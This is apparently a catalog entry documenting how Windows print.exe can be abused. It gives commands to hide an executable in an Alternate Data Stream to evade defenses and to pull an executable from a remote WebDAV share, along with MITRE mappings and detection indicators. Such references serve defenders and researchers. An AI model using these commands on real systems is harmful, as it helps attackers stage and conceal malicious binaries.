--- Name: Print.exe Description: Used by Windows to send files to the printer Author: 'Oddvar Moe' Created: '2018-05-25' Commands: - Command: print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe Description: Copy file.exe into the Alternate Data Stream (ADS) of file.txt. Usecase: Hide binary file in alternate data stream to potentially bypass defensive counter measures Category: ADS Privileges: User MitreID: T1096 MitreLink: https://attack.mitre.org/wiki/Technique/T1096 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: print /D:C:\ADS\CopyOfFile.exe C:\ADS\FileToCopy.exe Description: Copy FileToCopy.exe to the target C:\ADS\CopyOfFile.exe Usecase: Copy files Category: Copy Privileges: User MitreID: T1105 MitreLink: https://attack.mitre.org/wiki/Technique/T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: print /D:C:\OutFolder\outfile.exe \\WebDavServer\Folder\File.exe Description: Copy File.exe from a network share to the target c:\OutFolder\outfile.exe. Usecase: Copy/Download file from remote server Category: Copy Privileges: User MitreID: T1105 MitreLink: https://attack.mitre.org/wiki/Technique/T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - Path: C:\Windows\System32\print.exe - Path: C:\Windows\SysWOW64\print.exe Code Sample: - Code: Detection: - IOC: Print.exe getting files from internet - IOC: Print.exe creating executable files on disk Resources: - Link: https://twitter.com/Oddvarmoe/status/985518877076541440 - Link: https://www.youtube.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410 Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ---